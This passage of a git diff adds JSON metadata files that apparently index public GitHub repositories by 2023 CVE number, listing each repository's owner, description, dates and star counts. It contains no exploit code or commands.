"https:\/\/avatars.githubusercontent.com\/u\/75446753?v=4", + "html_url": "https:\/\/github.com\/3zizme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3zizme\/CVE-2023-49339", + "description": "Critical Security Vulnerability in Ellucian Banner System", + "fork": false, + "created_at": "2024-01-17T23:18:29Z", + "updated_at": "2024-04-11T18:26:35Z", + "pushed_at": "2024-01-17T23:20:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49438.json b/2023/CVE-2023-49438.json new file mode 100644 index 0000000000..cadb77a6b9 --- /dev/null +++ b/2023/CVE-2023-49438.json @@ -0,0 +1,33 @@ +[ + { + "id": 731811886, + "name": "CVE-2023-49438", + "full_name": "brandon-t-elliott\/CVE-2023-49438", + "owner": { + "login": "brandon-t-elliott", + "id": 126433368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126433368?v=4", + "html_url": "https:\/\/github.com\/brandon-t-elliott", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brandon-t-elliott\/CVE-2023-49438", + "description": "CVE-2023-49438 - Open Redirect Vulnerability in Flask-Security-Too", + "fork": false, + "created_at": "2023-12-14T23:58:42Z", + "updated_at": "2024-11-11T07:19:29Z", + "pushed_at": "2023-12-30T02:02:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49453.json b/2023/CVE-2023-49453.json new file mode 100644 index 0000000000..e85c28074a --- /dev/null +++ b/2023/CVE-2023-49453.json @@ -0,0 +1,33 @@ +[ + { + "id": 769446859, + "name": "CVE-2023-49453", + "full_name": "nitipoom-jar\/CVE-2023-49453", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-49453", + "description": null, + "fork": false, + "created_at": "2024-03-09T05:15:02Z", + "updated_at": "2024-03-09T05:15:36Z", + "pushed_at": "2024-03-09T05:19:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49471.json b/2023/CVE-2023-49471.json new file mode 100644 index 0000000000..317e23cf8d --- /dev/null +++ b/2023/CVE-2023-49471.json @@ -0,0 +1,33 @@ +[ + { + "id": 735350717, + "name": "CVE-2023-49471", + "full_name": "zunak\/CVE-2023-49471", + "owner": { + "login": "zunak", + "id": 14941490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941490?v=4", + "html_url": "https:\/\/github.com\/zunak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zunak\/CVE-2023-49471", + "description": null, + "fork": false, + "created_at": "2023-12-24T15:40:24Z", + "updated_at": "2023-12-24T15:42:33Z", + "pushed_at": "2023-12-24T15:44:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49496.json b/2023/CVE-2023-49496.json new file mode 100644 index 0000000000..689a394096 --- /dev/null +++ b/2023/CVE-2023-49496.json @@ -0,0 +1,33 @@ +[ + { + "id": 760186862, + "name": "CVE-2023-49496", + "full_name": "HuangYanQwQ\/CVE-2023-49496", + "owner": { + "login": "HuangYanQwQ", + "id": 155517523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155517523?v=4", + "html_url": "https:\/\/github.com\/HuangYanQwQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuangYanQwQ\/CVE-2023-49496", + "description": null, + "fork": false, + "created_at": "2024-02-20T00:11:52Z", + "updated_at": "2024-02-20T00:11:52Z", + "pushed_at": "2024-02-20T00:11:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49539.json b/2023/CVE-2023-49539.json new file mode 100644 index 0000000000..5bd4c133bf --- /dev/null +++ b/2023/CVE-2023-49539.json @@ -0,0 +1,33 @@ +[ + { + "id": 733656217, + "name": "CVE-2023-49539", + "full_name": "geraldoalcantara\/CVE-2023-49539", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49539", + "description": "Book Store Management System v1.0 - Cross-site scripting (XSS) vulnerability in \"index.php\/category\" - vulnerable field: \"Category Name\"", + "fork": false, + "created_at": "2023-12-19T20:31:36Z", + "updated_at": "2023-12-20T09:41:30Z", + "pushed_at": "2023-12-20T07:56:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49540.json b/2023/CVE-2023-49540.json new file mode 100644 index 0000000000..4cd3deaaa8 --- /dev/null +++ b/2023/CVE-2023-49540.json @@ -0,0 +1,33 @@ +[ + { + "id": 733661228, + "name": "CVE-2023-49540", + "full_name": "geraldoalcantara\/CVE-2023-49540", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49540", + "description": "Book Store Management System v1.0 - Cross-site scripting (XSS) vulnerability in \/index.php\/history - vulnerable field: \"Customer's Name\".", + "fork": false, + "created_at": "2023-12-19T20:50:09Z", + "updated_at": "2023-12-20T09:42:07Z", + "pushed_at": "2023-12-20T08:08:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49543.json b/2023/CVE-2023-49543.json new file mode 100644 index 0000000000..de1b4f3579 --- /dev/null +++ b/2023/CVE-2023-49543.json @@ -0,0 +1,33 @@ +[ + { + "id": 733666604, + "name": "CVE-2023-49543", + "full_name": "geraldoalcantara\/CVE-2023-49543", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49543", + "description": "Book Store Management System v1.0 - Incorrect Access Control ", + "fork": false, + "created_at": "2023-12-19T21:10:14Z", + "updated_at": "2023-12-20T09:43:06Z", + "pushed_at": "2023-12-19T21:24:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49544.json b/2023/CVE-2023-49544.json new file mode 100644 index 0000000000..e76ea903cd --- /dev/null +++ b/2023/CVE-2023-49544.json @@ -0,0 +1,33 @@ +[ + { + "id": 724470555, + "name": "CVE-2023-49544", + "full_name": "geraldoalcantara\/CVE-2023-49544", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49544", + "description": "Customer Support System 1.0 - Local File Inclusion", + "fork": false, + "created_at": "2023-11-28T06:21:51Z", + "updated_at": "2023-12-20T09:43:54Z", + "pushed_at": "2023-12-19T20:29:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49545.json b/2023/CVE-2023-49545.json new file mode 100644 index 0000000000..48513ef343 --- /dev/null +++ b/2023/CVE-2023-49545.json @@ -0,0 +1,33 @@ +[ + { + "id": 724455925, + "name": "CVE-2023-49545", + "full_name": "geraldoalcantara\/CVE-2023-49545", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49545", + "description": "Customer Support System 1.0 - Directory Listing", + "fork": false, + "created_at": "2023-11-28T05:33:06Z", + "updated_at": "2023-12-20T09:45:15Z", + "pushed_at": "2023-12-19T21:52:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49546.json b/2023/CVE-2023-49546.json new file mode 100644 index 0000000000..0d2f10768c --- /dev/null +++ b/2023/CVE-2023-49546.json @@ -0,0 +1,33 @@ +[ + { + "id": 733677633, + "name": "CVE-2023-49546", + "full_name": "geraldoalcantara\/CVE-2023-49546", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49546", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in the \"email\" Parameter During \"save_staff\" Operation", + "fork": false, + "created_at": "2023-12-19T21:54:36Z", + "updated_at": "2023-12-20T09:46:02Z", + "pushed_at": "2023-12-20T08:22:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49547.json b/2023/CVE-2023-49547.json new file mode 100644 index 0000000000..4bacc2a3ca --- /dev/null +++ b/2023/CVE-2023-49547.json @@ -0,0 +1,33 @@ +[ + { + "id": 724618079, + "name": "CVE-2023-49547", + "full_name": "geraldoalcantara\/CVE-2023-49547", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49547", + "description": "Customer Support System 1.0 - SQL Injection Login Bypass", + "fork": false, + "created_at": "2023-11-28T12:59:10Z", + "updated_at": "2023-12-20T09:47:00Z", + "pushed_at": "2023-12-19T22:26:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49548.json b/2023/CVE-2023-49548.json new file mode 100644 index 0000000000..8537d432b2 --- /dev/null +++ b/2023/CVE-2023-49548.json @@ -0,0 +1,33 @@ +[ + { + "id": 733685667, + "name": "CVE-2023-49548", + "full_name": "geraldoalcantara\/CVE-2023-49548", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49548", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in the \"lastname\" Parameter During \"save_user\" Operation", + "fork": false, + "created_at": "2023-12-19T22:27:24Z", + "updated_at": "2023-12-20T09:47:44Z", + "pushed_at": "2023-12-20T08:27:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49606.json b/2023/CVE-2023-49606.json new file mode 100644 index 0000000000..e65d189a51 --- /dev/null +++ b/2023/CVE-2023-49606.json @@ -0,0 +1,33 @@ +[ + { + "id": 797160207, + "name": "CVE-2023-49606", + "full_name": "d0rb\/CVE-2023-49606", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-49606", + "description": "Critical use-after-free vulnerability discovered in Tinyproxy", + "fork": false, + "created_at": "2024-05-07T10:03:01Z", + "updated_at": "2024-09-27T15:41:52Z", + "pushed_at": "2024-05-07T10:11:53Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4966.json b/2023/CVE-2023-4966.json new file mode 100644 index 0000000000..11fe73aa33 --- /dev/null +++ b/2023/CVE-2023-4966.json @@ -0,0 +1,452 @@ +[ + { + "id": 709418839, + "name": "CVE-2023-4966", + "full_name": "Chocapikk\/CVE-2023-4966", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-4966", + "description": "Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. ", + "fork": false, + "created_at": "2023-10-24T17:19:32Z", + "updated_at": "2024-11-13T03:21:39Z", + "pushed_at": "2023-10-26T14:16:05Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "citrix", + "cve-2023-4966", + "exploit", + "exploitation", + "infosec", + "memory-leak", + "netscaler", + "network-security", + "open-source", + "pentesting", + "python", + "security", + "security-research", + "session-tokens", + "vulnerability" + ], + "visibility": "public", + "forks": 12, + "watchers": 73, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 709624306, + "name": "citrix_cve-2023-4966", + "full_name": "dinosn\/citrix_cve-2023-4966", + "owner": { + "login": "dinosn", + "id": 3851678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4", + "html_url": "https:\/\/github.com\/dinosn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinosn\/citrix_cve-2023-4966", + "description": "Citrix CVE-2023-4966 from assetnote modified for parallel and file handling", + "fork": false, + "created_at": "2023-10-25T04:15:17Z", + "updated_at": "2024-07-25T13:30:51Z", + "pushed_at": "2023-10-25T04:30:14Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 709678513, + "name": "Netscaler-CVE-2023-4966-POC", + "full_name": "senpaisamp\/Netscaler-CVE-2023-4966-POC", + "owner": { + "login": "senpaisamp", + "id": 98622787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98622787?v=4", + "html_url": "https:\/\/github.com\/senpaisamp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/senpaisamp\/Netscaler-CVE-2023-4966-POC", + "description": "Proof Of Concept for te NetScaler Vuln", + "fork": false, + "created_at": "2023-10-25T07:17:54Z", + "updated_at": "2024-04-23T10:50:27Z", + "pushed_at": "2024-04-23T10:50:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709803873, + "name": "CVE-2023-4966-POC", + "full_name": "mlynchcogent\/CVE-2023-4966-POC", + "owner": { + "login": "mlynchcogent", + "id": 28465939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28465939?v=4", + "html_url": "https:\/\/github.com\/mlynchcogent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mlynchcogent\/CVE-2023-4966-POC", + "description": "Proof Of Concept for te NetScaler Vuln", + "fork": false, + "created_at": "2023-10-25T12:37:56Z", + "updated_at": "2024-12-14T14:31:57Z", + "pushed_at": "2023-10-25T08:29:35Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 710028645, + "name": "CVE-2023-4966", + "full_name": "IceBreakerCode\/CVE-2023-4966", + "owner": { + "login": "IceBreakerCode", + "id": 129914557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129914557?v=4", + "html_url": "https:\/\/github.com\/IceBreakerCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IceBreakerCode\/CVE-2023-4966", + "description": null, + "fork": false, + "created_at": "2023-10-25T21:34:43Z", + "updated_at": "2023-10-25T21:36:05Z", + "pushed_at": "2023-10-25T21:35:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710747980, + "name": "CVE-2023-4966", + "full_name": "0xKayala\/CVE-2023-4966", + "owner": { + "login": "0xKayala", + "id": 16838353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16838353?v=4", + "html_url": "https:\/\/github.com\/0xKayala", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xKayala\/CVE-2023-4966", + "description": "CVE-2023-4966 - NetScaler ADC and NetScaler Gateway Memory Leak Exploit", + "fork": false, + "created_at": "2023-10-27T11:00:09Z", + "updated_at": "2023-10-28T06:02:58Z", + "pushed_at": "2023-10-28T06:47:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 711157442, + "name": "citrix-logchecker", + "full_name": "certat\/citrix-logchecker", + "owner": { + "login": "certat", + "id": 14126796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14126796?v=4", + "html_url": "https:\/\/github.com\/certat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/certat\/citrix-logchecker", + "description": "Parse citrix netscaler logs to check for signs of CVE-2023-4966 exploitation", + "fork": false, + "created_at": "2023-10-28T11:44:42Z", + "updated_at": "2024-06-27T06:22:21Z", + "pushed_at": "2023-11-03T17:09:05Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711541796, + "name": "CVE-2023-4966", + "full_name": "RevoltSecurities\/CVE-2023-4966", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-4966", + "description": "An Exploitation script developed to exploit the CVE-2023-4966 bleed citrix information disclosure vulnerability", + "fork": false, + "created_at": "2023-10-29T15:31:37Z", + "updated_at": "2024-07-10T17:55:56Z", + "pushed_at": "2023-10-29T17:43:05Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 721262627, + "name": "CVE-2023-4966", + "full_name": "s-bt\/CVE-2023-4966", + "owner": { + "login": "s-bt", + "id": 48731760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48731760?v=4", + "html_url": "https:\/\/github.com\/s-bt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-bt\/CVE-2023-4966", + "description": "Scripts to get infos", + "fork": false, + "created_at": "2023-11-20T17:32:16Z", + "updated_at": "2023-11-20T17:36:18Z", + "pushed_at": "2023-11-20T17:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724052502, + "name": "CVE-2023-4966", + "full_name": "byte4RR4Y\/CVE-2023-4966", + "owner": { + "login": "byte4RR4Y", + "id": 121404035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121404035?v=4", + "html_url": "https:\/\/github.com\/byte4RR4Y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byte4RR4Y\/CVE-2023-4966", + "description": "Programm to exploit a range of ip adresses", + "fork": false, + "created_at": "2023-11-27T09:51:30Z", + "updated_at": "2023-11-27T09:52:07Z", + "pushed_at": "2023-11-27T10:04:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729065658, + "name": "cve-2023-4966-iocs", + "full_name": "jmussmann\/cve-2023-4966-iocs", + "owner": { + "login": "jmussmann", + "id": 24474138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24474138?v=4", + "html_url": "https:\/\/github.com\/jmussmann", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jmussmann\/cve-2023-4966-iocs", + "description": "Python script to search Citrix NetScaler logs for possible CVE-2023-4966 exploitation.", + "fork": false, + "created_at": "2023-12-08T10:28:15Z", + "updated_at": "2023-12-08T10:34:06Z", + "pushed_at": "2023-12-09T12:55:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 732499705, + "name": "overread", + "full_name": "morganwdavis\/overread", + "owner": { + "login": "morganwdavis", + "id": 4434533, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4434533?v=4", + "html_url": "https:\/\/github.com\/morganwdavis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/morganwdavis\/overread", + "description": "Simulates CVE-2023-4966 Citrix Bleed overread bug", + "fork": false, + "created_at": "2023-12-16T21:55:04Z", + "updated_at": "2024-04-22T12:46:33Z", + "pushed_at": "2023-12-31T10:40:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854445410, + "name": "CVE-2023-4966", + "full_name": "LucasOneZ\/CVE-2023-4966", + "owner": { + "login": "LucasOneZ", + "id": 122230924, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122230924?v=4", + "html_url": "https:\/\/github.com\/LucasOneZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasOneZ\/CVE-2023-4966", + "description": null, + "fork": false, + "created_at": "2024-09-09T07:26:24Z", + "updated_at": "2024-09-14T13:42:06Z", + "pushed_at": "2024-09-14T13:42:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 905152305, + "name": "CVE-2023-4966-exploit", + "full_name": "akshthejo\/CVE-2023-4966-exploit", + "owner": { + "login": "akshthejo", + "id": 192083618, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/192083618?v=4", + "html_url": "https:\/\/github.com\/akshthejo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akshthejo\/CVE-2023-4966-exploit", + "description": "CVE-2023-4966-exploit", + "fork": false, + "created_at": "2024-12-18T09:09:20Z", + "updated_at": "2024-12-18T09:14:49Z", + "pushed_at": "2024-12-18T09:14:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49950.json b/2023/CVE-2023-49950.json new file mode 100644 index 0000000000..d510a43b9c --- /dev/null +++ b/2023/CVE-2023-49950.json @@ -0,0 +1,33 @@ +[ + { + "id": 750788126, + "name": "cve-2023-49950", + "full_name": "shrikeinfosec\/cve-2023-49950", + "owner": { + "login": "shrikeinfosec", + "id": 107105450, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107105450?v=4", + "html_url": "https:\/\/github.com\/shrikeinfosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shrikeinfosec\/cve-2023-49950", + "description": "A write-up detailing CVE-2023-49950. Affects Logpoint SIEM v6.1.0-v7.3.0", + "fork": false, + "created_at": "2024-01-31T10:18:12Z", + "updated_at": "2024-01-31T12:04:55Z", + "pushed_at": "2024-01-31T12:10:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49954.json b/2023/CVE-2023-49954.json new file mode 100644 index 0000000000..34970572bd --- /dev/null +++ b/2023/CVE-2023-49954.json @@ -0,0 +1,33 @@ +[ + { + "id": 731730712, + "name": "CVE-2023-49954.github.io", + "full_name": "CVE-2023-49954\/CVE-2023-49954.github.io", + "owner": { + "login": "CVE-2023-49954", + "id": 153858003, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153858003?v=4", + "html_url": "https:\/\/github.com\/CVE-2023-49954", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CVE-2023-49954\/CVE-2023-49954.github.io", + "description": "SQL Injection in 3CX CRM Integration", + "fork": false, + "created_at": "2023-12-14T18:38:28Z", + "updated_at": "2023-12-19T21:05:59Z", + "pushed_at": "2023-12-18T07:00:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49964.json b/2023/CVE-2023-49964.json new file mode 100644 index 0000000000..ff24a84225 --- 